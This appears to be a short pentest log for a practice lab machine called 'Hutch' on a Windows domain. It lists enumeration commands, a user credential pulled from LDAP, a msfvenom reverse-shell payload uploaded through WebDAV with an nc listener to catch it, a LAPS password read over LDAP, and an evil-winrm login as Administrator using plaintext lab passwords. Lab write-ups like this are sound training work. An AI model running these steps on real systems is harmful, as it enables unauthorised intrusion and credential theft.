🧪 Pentest Log: {{date:2025-08-04}}

🔍 Target Information

• Machine Name: Hutch
• IP Address: 192.168.223.122
• Operating System: Windows

ip=192.168.223.122

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 53

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found WebDAV installed

Port 135

Port 139, 445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 389, 636, 3268, 3269

ldapsearch -H ldap://$ip -x -s base namingcontexts

ldapsearch -H ldap://$ip -x -b"DC=hutch,DC=offsec" > ldap_dump.txt

found fmcsorley's credential

fmcsorley:CrabSharkJellyfish192

Port 5985

💣 Exploitation / Foothold

Tool / Script Used:

cadaver http://192.168.120.108

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.5 LPORT=445 -f exe -o shell.exe

put shell.exe

nc -lvnp 445

🧬 Privilege Escalation

👤 Current Access

• User: iis apppool\defaultapppool
• Groups: N/A
• Shell Type: reverse tcp shell

🔍 Enumeration

ldapsearch -v -c -D fmcsorley@hutch.offsec -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://$ip "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: N/A
• Target Binary/Service: WINRM
• Reference / Source: N/A

🔧 Exploit Steps

• Smash to Administrator

evil-winrm -i $ip -u "Administrator" -p ';c-90#K#nu)+P@'